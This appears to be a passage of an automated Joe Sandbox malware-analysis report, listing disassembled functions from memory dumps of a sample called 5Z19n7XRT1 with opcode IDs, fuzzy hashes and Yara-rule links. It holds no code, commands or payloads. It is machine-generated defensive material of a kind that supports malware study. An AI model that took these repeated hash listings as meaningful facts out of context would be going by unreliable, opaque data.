                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LB
                                                                                                                                                                                                                                                                          • API String ID: 0-539997225
                                                                                                                                                                                                                                                                          • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                          • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                                          Function 0041DD50 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                          • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                                                                                                                                                                                                                                          Function 024ADFB7 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                          • Instruction ID: f9926f97e3c778b3f1d9c1f8e24e0c92a3c0a75791df361c75dae871acd1ab51
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51512733B499A14BE72D893C4C723A6AA834BE6134B2DD77BD8B1CB3E5D56588468340
                                                                                                                                                                                                                                                                          Function 024B8009 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: m
                                                                                                                                                                                                                                                                          • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                          • Opcode ID: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                                          • Instruction ID: e53377bff7785aab9c860189b37f281a10190bc6254a0cb92638023f3cbf7aaf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE5136B19083808FD724DF2984916AFBBE6AFD1304F05892EE5D547351D739D909CF92
                                                                                                                                                                                                                                                                          Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                          Function 024CA9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction ID: df1b4b5bbd16396a99fa834d7ad3d71079d0bb8adfbdcfcaeee253d25b5b0675
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 624126BAE116258FD704DFA4CC845ABBB72FB84315B1AC1A8C8847B319D77869078BD0
                                                                                                                                                                                                                                                                          Function 024CCFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                          • Instruction ID: 119f3cb10ec40df81934660e4df2343e58433ea6d49c8757dafbc4cdbe146c8c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B31E638704300ABD7909F2E9C81B3BB7A5EB8672CF34453DE58593290D761E8518A56
                                                                                                                                                                                                                                                                          Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 53ff61613a6750327358e77a3d2a2db8208b12b742968293ea1bf310bf76e569
                                                                                                                                                                                                                                                                          • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53ff61613a6750327358e77a3d2a2db8208b12b742968293ea1bf310bf76e569
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                                          Function 024CD0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                          • Instruction ID: 64227dee920a6a19049b1cc715272b82efc64a6e3f3c5d75cb337066e19d8a55
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31E43CB04301EBE6919F289C81B3BF7A5EB8A718F34453DE68497390DB30E850CA56
                                                                                                                                                                                                                                                                          Function 024B6739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: dB
                                                                                                                                                                                                                                                                          • API String ID: 0-2104629891
                                                                                                                                                                                                                                                                          • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                          • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                                          Function 004143C2 Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                          • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                                          Function 00416BA5 Relevance: .7, Instructions: 688COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                          • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                                          Function 00402FA0 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                                          Function 02493207 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction ID: 8f991530f7654b7407438beebf5f349a429091c2cbb7848180569c028d16a059
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B552E4315083458FCB14CF19C0906AABFE1FF8A318F1986AEF8995B341D775E989CB81
                                                                                                                                                                                                                                                                          Function 004066E0 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                          • Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A
                                                                                                                                                                                                                                                                          Function 02496947 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                          • Instruction ID: af85ab077d7c3c700c3b2808528cf372c4439bdc5a6cc90dcaa067268ddbbce5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD52B2B0A08B848FEF35CB24C4843A7BFE5AB81314F15492FD5EA06BC6D379A585CB15
                                                                                                                                                                                                                                                                          Function 0041F0E0 Relevance: .6, Instructions: 640COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                          • Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                                                                                                                                                                                                                                          Function 024AF347 Relevance: .6, Instructions: 640COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                          • Instruction ID: 15b57a3abb86d6637cdeda7796a4734181c9bd0eb0182722cd8f4e8d99934f2e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1625BB0608B818ED325CF3C8855797BFE5AB5A314F088A5DE0EE873D2C7B56405CB66
                                                                                                                                                                                                                                                                          Function 02493C27 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                                                                                                                                                                                                                                          • Instruction ID: babe7465171b799a6d63a27757cc696952f40040f38c93282d1d2f15e6d086e1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60322670514B118FCB78CF29C690626BBF1BF46610B504A6ED6A787F90D736F886CB14
                                                                                                                                                                                                                                                                          Function 004074B0 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                          • Instruction ID: 1131e2afb1b9b7a06d06e0851762e967182e12a53f43e8bd2da4f6050e1e8ff1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C802C732A0C7118BC724DE18D8816ABB3E2EBD4345F19893ED586A73C5D738B815CB4B
                                                                                                                                                                                                                                                                          Function 02497717 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                          • Instruction ID: 61ee59b1add65826ecfbe8752139ef148b61917f0458f9144afc9c1663dff689
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0202D6726187518BDB24DF18D8807BBF7E2EFC4309F19892ED98687385D734A946CB42
                                                                                                                                                                                                                                                                          Function 004180A9 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
